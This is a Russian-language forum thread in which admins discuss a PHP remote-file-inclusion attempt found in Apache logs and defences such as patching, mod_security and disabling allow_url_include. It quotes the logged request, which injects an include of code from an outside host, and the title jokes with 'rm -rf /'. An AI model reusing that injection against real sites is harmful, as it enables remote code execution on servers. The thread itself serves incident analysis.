PHP-крякалка

rm -rf / наше фсйо!

http://www.ossec.net/wiki/index.php/Mic22

ага - ну в принципе понял.
Я правильно понимаю, что к даной атаке уязвимы токо PHP-based сайты ?

> токо PHP-based сайты ?

Если php не установлен - то, конечно, коду будет просто не в чем исполняться. Однако если обнаружил что-то чужеродное в системе - типа такого скриптика - то стоит разобраться с тем, как он вообще туда попал.

Та не, не обнаружил. Просто в логах апача урлы с php insertion с инклудом на выщеуказаный урл, по которому и лежит такой скриптик

> урлы с php insertion

а что, апач такое обрабатывает и отдает PHP на выполнение? O_O

Извини, я не знаю что такое "урлы с php insertion" :-)

Но если скриптик лежит - то как-то он туда попал, да?

Урл фот такой фот, выдрал из логов :
GET /forum//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlig
ht=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt?
HTTP/1.1" 403

Очевидно происходит попытка подгрузить php код с http://party4you.ch/new/id.txt.

Ну вот я интереса ради в браузере набрал http://party4you.ch/new/id.txt и увидел тот кусок. И всё.

апач не должен такое обрабатывать вообще.

> HTTP/1.1" 403

Забей. У тебя всё нормально.

проверьте последнюю ли версию форума вы используете и пропачьте до последней в случае необходимости. вот если апач отдаст этот гет запрос с кодом 200  догда патчить в обязательном порядке.

правда? Это же обрабатывается php интерпретатором. В cgi или mod_php версии, совсем не суть. При отсутствии каких-нибудь секурити патчей на апач или php - это работает. Проверено. Только теги php там далеко невсегда нужны/работает с ними. А так - классическое использование дырявых инклюдов.

2топикстартер:

Латайте дыры.

> Латайте дыры.

Разуй глаза, дурень - у него нет дыр. Потому, что ничего похапешного не юзается. Он же четко написал. И сервер на этот запрос ошибку отдал. А дыры пробиваются автоматикой - проверки идут пачками.

Дон анонимус - Вы быдло и грубиян.

Про 403 - да не смотрел, отвечал на конкретный пост. А вот про php - разуйте глаза сами, уважаемый. Автор не пишет однозначно, что у него нету php. Уточняет лишь, какие движки подвержены данной атаке.

> правда? Это же обрабатывается php интерпретатором.

ага. но отдается интерпретатору из апача. вопрос на засыпку - почему апач такие GET запросы вообще отдает на выполнение интерпретатору?

> При отсутствии каких-нибудь секурити патчей на апач или php - это работает. Проверено.

PS: mod_security.

Раньше таких вопросов не ставили ) Нужно, чтобы работало, а интерпретатор и скрипты пусть сами разбираются что там не так с запросом.

P.S. Беда в том, что в этом модуле для безопасности несколько раз находили очень неприятные дыры. Я не помню, есть ли там защита от такого рода атак ( внешний инклюд через передаваемый параметр ), но может быть что-то есть в hardened-php. Очень не уверен, правда, нуно смотреть.

> есть ли там защита от такого рода атак

там есть возможность режекта запросов с определенными GET параметрами.

> hardened-php

опять же, имхо, такие вещи лучше рубить до передачи интерпретатору.

> Автор не пишет однозначно, что у него нету php.

Ладно, с этим согласился.

> mod_security

mod_security - это правильно, но тем не менее allow_url_include лучше запретить.. Оно вообще-то по дефолту запрещено должно быть.

> Я не помню, есть ли там защита от такого рода атак ( внешний инклюд через передаваемый параметр ), но может быть что-то есть в hardened-php. Очень не уверен, правда, нуно смотреть.

php.ini : Ищи allow_url_include и allow_url_fopen. Там написано для чего они.

Да мне не нуно ) Про fopen помню. Но ведь он испольщуется не только для инклюдов. То есть, это не совсем то.

allow_url_include самое-то имхо.

Не совсем точно выразился. Я не про мод_секурити, а про hardened_php.

Вобще с точски зрения экономии ресурсов, конечно лучше это делат до запуска интерпретатора. Тут я согласен. Главное, чтоб сам инструмент не ломался )